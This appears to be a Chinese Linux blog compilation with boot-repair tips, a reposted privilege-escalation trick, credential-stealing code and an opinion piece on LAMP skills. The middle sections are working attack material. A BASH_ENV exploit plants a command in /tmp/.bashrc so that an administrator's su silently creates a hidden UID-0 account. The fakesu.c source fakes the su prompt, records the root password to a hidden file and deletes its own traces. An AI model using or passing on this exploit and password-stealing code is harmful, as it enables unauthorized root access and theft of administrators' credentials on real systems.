1.系统起不来,可以先进去单用户模式,直接在grub 菜单内核后面加1就可以进去,root密码忘记也可以这样修复。
2.系统盘,进入修复模块。chroot什么的,系统有提示的。
3。也是今天要说的。
系统启动过程中,不加载init,跳过init。直接加载一个shell。

和进入单用户类似,内核菜单后面添加内容一些内容。init=/bin/bash。直接指向bash。
因为不经过init,所有系统下的东西都不加载。可见系统也是只读的,没有经过fstab,只读不能修改任何东西的。
手工挂载。输入命令#mount /proc / -o remount,rw.这样就可以修改了
根据刚才系统不能启动错误提示,去修改一些地方。
然后mount /proc / -o remount,ro 还是变为只读吧。因为现在关机的时候,系统不会自动解挂。防止文件损坏。
最后reboot,安全重启就ok了。

linux下$BASH_ENV变量的利用

转载一编提权文章做解释:

一个linux提权用的技巧,放出来攒RP了。
OK,通常情况下,我们在执行bash脚本的时候,有一个执行过程,其中有一点比较重要:如果BASH_ENV被设置的话,它就会执行BASH_ENV指向的脚本
一个test:
以下是引用片段:
[xiaoyu@localdomain ~]$ echo $BASH_ENV
[xiaoyu@localdomain ~]$ export BASH_ENV="/tmp/.bashrc"
[xiaoyu@localdomain ~]$ echo $BASH_ENV
/tmp/.bashrc
[xiaoyu@localdomain ~]$ cat /tmp/.bashrc
#!/bin/bash
echo "Hello"
[xiaoyu@localdomain ~]$ ls -l
-rwxrwxr-x 1 xiaoyu xiaoyu 22 2008-09-11 05:54 test.sh

[xiaoyu@localdomain ~]$ cat test.sh
#!/bin/bash
echo "kk"
[xiaoyu@localdomain ~]$ ./test.sh
Hello
kk

恩,很好,和我们预期的一样。看看我们怎么利用。

grep su ~/.bash_history
显示此用户有使用su登录root账户的特殊癖好。以前我们遇到这种情况通常就是塞个fakesu.c进去。然后修改.bash_profile,建立个别 名之类的东西。通过getpass来获得root密码,记录,然后去除别名…..关键是管理员使用正确密码登录的时候也是会提示一次密码错误。遇到傻 点的管理员可能就放过这个细节了,再输入一遍密码就OK了。但是某些非人类admin会以最快的速度检查系统被入侵的迹象,外加啥啥啥,而且这种管理员改 root密码几乎是肯定的了。所以偷取下来的密码也没啥用处。恩,聪明的X客们一定知道我要做什么了。呵呵,先看看环境变量su后在不
以下是引用片段:
[xiaoyu@localdomain ~]$ echo $BASH_ENV
/tmp/.bashrc
[xiaoyu@localdomain ~]$ su
Password:
[root@localdomain xiaoyu]# echo $BASH_ENV
/tmp/.bashrc

OK,实验结束,实战:
以下是引用片段:
[xiaoyu@localdomain tmp]$ echo ’/usr/sbin/useradd -u 0 -o kk 2> /dev/null’ > /tmp/.bashrc
[xiaoyu@localdomain tmp]$ cat /tmp/.bashrc
/usr/sbin/useradd -u 0 -o kk 2> /dev/null
[xiaoyu@localdomain tmp]$ grep kk /etc/passwd
[xiaoyu@localdomain tmp]$ echo $BASH_ENV
/tmp/.bashrc
[xiaoyu@localdomain tmp]$ su
Password:
[root@localdomain tmp]# cd /home/xiaoyu



解释。
.bash_profile 文件内容

# .bash_profile

# Get the aliases and functions
if [ -f ~/.bashrc ]; then
. ~/.bashrc
fi

# User specific environment and startup programs

PATH=$PATH:$HOME/bin

export PATH
unset USERNAME

———————————————————————————————————————————-
———————————————————————————————————————————-
.bashrc文件
# .bashrc

# User specific aliases and functions

alias rm=’rm -i’
alias cp=’cp -i’
alias mv=’mv -i’

# Source global definitions
if [ -f /etc/bashrc ]; then
. /etc/bashrc
fi

———————————————————————————————————————————-
———————————————————————————————————————————-
每当执行bash脚本,就会调用。默认是=>bash_profile。它在调用别的脚本。

$BASH_ENV变量定义后,直接掉过常规。
/tmp目录默认谁都可以写的,谁都可以调用。在httpd提权时,可以上传文件到这,可惜没有拿下。

export定义环境变量,启动一个shell后会改变。

只用su进去之后,环境变量没有改变。所以调用BASH时,创建用户。

$:su - root&#160; //可以预防,改变环境变量到root。




linux 记录su登陆密码代码

/*
* kpr-fakesu.c V0.9beta167 ;P
* by koper <[email]koper@linuxmail.org[/email]>

Setting up:
* admin@host:$ gcc -o .su fakesu.c; rm -rf fakesu.c
* admin@host:
$ mv .su /var/tmp/.su
* admin@host:$ cp .bash_profile .wgetrc
* admin@host:
$ echo "alias su=/var/tmp/.su">>.bash_profile
* admin@host:$ logout
* *** LOGIN **
admin@host:
$ su
* Password:
* su: Authentication failure
* Sorry.
* admin@host:$ su
* Password:
* root@host:
# logout
* admin@host:$ cat /var/tmp/.pwds
* root:dupcia17
* admin@host:
$
*
* /bin/su sends various failure information depending on the OS ver.
* Please modify the source to make it "fit" ;)
*
*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

main(int argc, char *argv[]){

FILE *fp;
char *user;
char *pass;
char filex[100];
char clean[100];

sprintf(filex,"/var/tmp/.pwds");
sprintf(clean,"rm -rf /var/tmp/.su;mv -f /home/sichunfeng/.wgetrc /home/sichunfeng/.bash_profile");
if(argc==1) user="root";
if(argc==2) user=argv[1];
if(argc>2){
if(strcmp(argv[1], "-l")==0)
user=argv[2];
else user=argv[1];}

fprintf(stdout,"Password: ");
pass=getpass ("");
system("sleep 3");
fprintf(stdout,"su: Authentication failurenSorry.n");

if ((fp=fopen(filex,"w")) != NULL)
{
fprintf(fp, "%s:%sn", user, pass);
fclose(fp);
}

system(clean);
system("rm -rf /var/tmp/.su; ln -s /bin/su /var/tmp/.su");
}

LAMP自己的另一种见解

LAMP环境=linux+Apache+mysql+php 多么完美的搭档。
慢慢的发现,这个组合环境是多么的简单,多么的没有技术。
在公司工作两个星期,所见、所想和大家分享一下。
下面是自己的一些片面的见解。正好也组成了LAMP,也和原始的LAMP深一步的理解。欢迎大家拍砖哈。

L=linux。这里是我认为只叫linux,不合适,范围太大、太广、太深了。当前电子产品发展速度这么快。做嵌入式开发已经是一个趋势了。编译linux内核,自己裁剪系统是做系统的根本。这又离不开速度快、安全性高、开源的linux。可见linux内核系统是多么的重要。

A这里不是Apache了,而是泛指源代码,也就是说自己有写代码和编译代码的能力。也就是linux开发。如果你会编译内核,看懂内核代码,那这里的写代码的能力,应该就不用说了。

M这里也不是Mysql数据库,而是泛指数据库。现在只要是一个储存型或交互性软件(也许可以这样说),都离不开数据库。应该有设计和建设数据库的能力。去公司,别人都会问会安装数据库吗?笑话,安装谁不会,没有技术的。。也赚不到大钱的。。

P=web编程语言。php语言在web编程中,是速度最快的一个。不知道安全性,算不算厉害。不管是什么语言,你至少会一种web编程语言。也就是说必须具备web编程能力。。

如果你具备我说这几种能力,我相信找工作,真是九牛一毛的问题。组建团队,自己开公司也是没有问题的。

越来越发现自己越来越渺小、自己越来越垃圾、越来越令自己厌烦。
学习的时候,总是感觉差不多了,现在可见,学的一塌糊涂啊、什么都不会啊 。呜呜、
自己会慢慢努力的,期望越大失望越大呗。但是自己从来没有放弃过。因为我没有资本,没有资本是最大的资本。嘿嘿,理由找不不错。
就写到这把,想多。
最后,希望自己和自己的朋友、同学。都能够在linux上大展身手。以为公司里会linux的人太少了。linux才是咱们的资本、自学更是资本。

转载请注明:http://hi.baidu.com/key1088。